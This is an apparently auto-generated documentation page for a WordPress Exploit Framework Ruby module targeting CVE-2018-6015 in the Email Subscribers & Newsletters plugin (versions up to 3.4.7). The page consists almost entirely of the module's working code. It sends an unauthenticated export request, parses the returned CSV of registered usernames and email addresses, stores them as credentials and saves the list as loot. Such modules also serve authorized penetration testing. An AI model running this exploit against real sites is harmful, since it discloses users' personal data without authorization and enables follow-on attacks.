class Wpxf::Auxiliary::EmailSubscribersUserListDisclosure

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 9
def initialize
  super

  update_info(
    name: 'Email Subscribers & Newsletters <= 3.4.7 User List Disclosure',
    desc: %(
      This module exploits a vulnerability in Email Subscribers & Newsletters
      which allows anonymous users to download a list of the registered users
      and the associated e-mail addresses.
    ),
    author: [
      'Threat Press', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '9014'],
      ['CVE', '2018-6015'],
      ['URL', 'https://blog.threatpress.com/vulnerability-email-subscribers-plugin/']
    ],
    date: 'Jan 24 2018'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 32
def check
  check_plugin_version_from_readme('email-subscribers', '3.4.8')
end
parse_csv(body, delimiter) click to toggle source
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 63
def parse_csv(body, delimiter)
  @users = [{
    username: 'Username', email: 'E-mail'
  }]

  begin
    CSV::Converters[:blank_to_nil] = lambda do |field|
      field&.empty? ? nil : field
    end
    csv = CSV.new(
      body,
      col_sep: delimiter,
      headers: true,
      header_converters: :symbol,
      converters: %i[all blank_to_nil]
    )

    csv.to_a.map { |row| process_row(row) }
    emit_table @users
    return true
  rescue Error
    return false
  end
end
process_row(row) click to toggle source
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 56
def process_row(row)
  return unless row[:name] && row[:email]
  emit_success "Found user: #{row[:name]} (#{row[:email]})", true
  store_credentials row[:name]
  @users.push(username: row[:name], email: row[:email])
end
request_user_list() click to toggle source
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 36
def request_user_list
  res = execute_post_request(
    url: full_uri,
    params: { 'es' => 'export' },
    body: { 'option' => 'registered_user' }
  )

  if res.nil?
    emit_error 'No response from the target'
    return nil
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return nil
  end

  res
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb, line 88
def run
  return false unless super

  emit_info 'Requesting the user list...'
  res = request_user_list
  return false if res.nil?

  emit_info 'Parsing result...', true
  parse_csv res.body, ','

  loot = export_and_log_loot(res.body, 'Registered users and e-mail addresses', 'user list', '.csv')
  emit_success "User list saved to #{loot.path}"

  true
end